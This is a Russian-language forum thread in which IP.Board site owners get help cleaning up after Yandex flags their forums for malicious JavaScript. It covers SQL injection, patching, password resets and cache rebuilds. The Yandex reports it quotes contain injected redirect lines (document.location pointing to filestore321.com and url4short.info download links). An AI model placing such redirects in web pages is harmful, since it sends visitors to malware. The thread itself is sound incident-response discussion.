Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

 

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

 

Поведенческий анализ

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

 

Написал вопрос в саппорт, ответ был следующим:

 

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

 

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

 

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

они для 3.1.х, 3.2.х и 3.4.х, а у меня 3.4.х

Где вы там уведели прошлогодний патч для 3.1x? Поддержка этой версии закончилась три года назад.

http://ipbskins.ru/forum/topic13571.html#entry89862 (патч от 9 Ноября 2014) и все последующие патчи.

 

Так а как найти вирус?

Какой вирус?

В отчете айболита ничего подозрительного нету.

Странно, Яндекс.Вебмастер об угрозах молчит

Странно было если бы форум был заражен а яндекс молчал. В противном случае скорее всего форум чист. Возможно не успели или не смогли расшифровать хеш пароля, либо при входе в АЦ стоит дополнительная авторизация, а без доступа в админцентр встроить вредоносный код намного сложнее.

В отчете айболита ничего подозрительного нету.

 

Так значит беспокоится не о чем. А как же sql_latest_error.cgi? Просто поставить патч и всё?

А как же sql_latest_error.cgi? Просто поставить патч и всё?

Ошибка в sql логе говорит о том, что на форуме проводилась sql инъекция которая позволяет получить произвольный доступ к данным форума, к таким как ключ авторизации, хеш пароля и прочим. Имея эти данные злоумышленник, расшифровав хеш, может авторизоваться на форуме под любой учетной записью имеющей доступ в АЦ. Отсюда надеюсь понятно, что одними патчами уже нельзя обойтись. Следует также сменить все пароли администраторов (с обязательным сбросом ключа авторизации), чьи хеши скомпрометированы и которыми злоумышленник может воспользоваться. Получить конфиденциальные данные это тоже считается взломом, не только дефейс или инфицирование сайта.

Здравствуйте! Перечитал всю тему. Просканировал манулом, но вредоносного кода не обнаружил, при этом ТП яндекс прислал письмо

"К сожалению, на Вашем сайте повторно появился указанный ниже вредоносный код:

 

document.location='http://url4short.info/c64bad21'

 

при подгрузке следующего url:

 

autopaty.com.ua/index.php?ipbv=9fea7de314a3082c69f1615e16d6b1c8&g=js

 

Пожалуйста, проверьте Ваши файлы и удалите вредоносный код."

Не знаю каким образом вы перечитали всю тему, потому что лечение от этого вируса обсуждалось здесь стопиццот раз прямо со второго сообщения. Я не услышал ни одного конкретного пункта который вы должно были проделать, а для эффективного лечения их нужно выполнить все. Попробуйте еще раз перечитать тему, и на этот раз вникать в суть написанного. Не получается - обращайтесь к услугам специалистов, мы всегда будем рады вам помочь.

Быстро просканировав сайт скриптом от siv1987

 

Получил такой результат:

 

От яндекса получил такое письмо:

На Вашем сайте периодически появляется указанный ниже вредоносный код: document.location='http://url4short.info/62decc30' при подгрузке следующего url: nlc-zone.ru/forum/public/min/index.php?ipbv=b7af755633926f5a00313de81c8c7342&g=js

 

1. Кеш стилей и языков обновил

2. пароли сменил

3. отключил сжатие JS / CSS

 

Окромя того что нашел scan.php нигде ничего нет :(

Быстро просканировав сайт скриптом от siv1987

Этот скрипт не предназначен для поиска вирусов и лишь служит для быстрого поиска некоторых функций используемых в бэкдорах. Для поиска вирусов используйте специализированые скрипты и по.

 

 

Окромя того что нашел scan.php нигде ничего нет

Если вы проделали все пункты - дайте на перепроверку и ждите результат.

Сжатие css не имеет никакого отношения, не знаю откуда вы это взяли, а вот обновления безопасности ставить нужно, иначе все остальное будет бесполезно.

Все решилось перестроением кешей стилей, сменой паролей и переименовыванием папки admin.